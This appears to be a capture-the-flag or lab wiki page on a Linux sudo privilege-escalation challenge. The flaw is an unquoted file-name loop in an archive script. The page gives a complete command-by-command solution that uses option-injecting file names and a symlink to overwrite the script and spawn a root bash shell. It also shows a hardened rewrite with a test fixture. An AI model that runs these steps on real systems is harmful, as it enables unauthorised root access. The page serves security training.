Challenge 19: Copy Llama
Bob Micheletto edited this page Feb 20, 2023 · 1 revision
Level: Hard
Sudo Rule: localuser19 ALL=(ALL) NOPASSWD: /usr/local/bin/dir_archive.sh
Notes: This is variation five on the copy theme. A technique similar to Challenge 3 is required to make it work, with some additional steps to get the command-line flags into place.
The exploit is possible because the shell script does not quote the file names it expands here:
for F in * ; do
    /bin/cp $F /archives/${DIR}
done
That $F is unquoted, so every file name in the current working directory is word-split and handed to cp as separate arguments, and a name that starts with a dash is parsed as an option. Files can therefore be created whose names contain the flags, spaces, and file names needed to repeat the exploit from Challenge 3.
Yes, sudo /usr/local/bin/dir_archive.sh has to be run twice.
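As an added example (not the challenge's own dir_archive.sh), here is the loop shape the page quotes next to a hardened rewrite, with a constructed source directory to show how the two behave; the function names, the temp-directory layout and the sample file names are my own.

```shell
#!/bin/sh
# Added example, not the challenge's script: the unquoted loop from the
# page beside a hardened version, plus a constructed self-check.

# Vulnerable shape from the page: $F is unquoted, so a name such as
# "-d link" is split into the two cp arguments "-d" and "link".
archive_vuln() {
    ( cd "$1" && for F in * ; do /bin/cp $F "$2" ; done )
}

# Hardened: "$F" stays one argument, "--" ends option parsing so a leading
# dash is a file name, and symlinks are skipped instead of followed.
# The destination ($2) is expected to be an absolute path.
archive_safe() {
    ( cd "$1" && for F in * ; do
        [ -f "$F" ] && [ ! -L "$F" ] || continue
        /bin/cp -- "$F" "$2/"
    done )
}

# Constructed fixture: a regular file named "-d link", a normal file and a
# symlink to a file inside the temp dir. Runs the given archiver and
# returns the destination listing as a comma-separated string.
run_demo() {
    work=$(mktemp -d)
    mkdir "$work/src" "$work/dst"
    echo target > "$work/target"
    echo data > "$work/src/-d link"
    echo data > "$work/src/normal.txt"
    ln -s "$work/target" "$work/src/link"
    "$1" "$work/src" "$work/dst" 2>/dev/null || :
    ls "$work/dst" | sort | tr '\n' ','
    rm -rf "$work"
}
```

With archive_safe the listing is `-d link,normal.txt,` (the symlink is skipped); with archive_vuln the file called `-d link` never reaches the destination because cp consumed its name as an option.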
Solution:
sudo -l
cat /usr/local/bin/dir_archive.sh
mkdir /tmp/files
cd /tmp/files
ln -s /usr/local/bin/dir_archive.sh link
cp --help
touch ./'-d link'
sudo /usr/local/bin/dir_archive.sh
ls -l /archives/file/link
rm ./'-d link'
rm link
cat > link <<EOF
#!/bin/sh
/bin/bash
EOF
sudo /usr/local/bin/dir_archive.sh
sudo /usr/local/bin/dir_archive.sh
id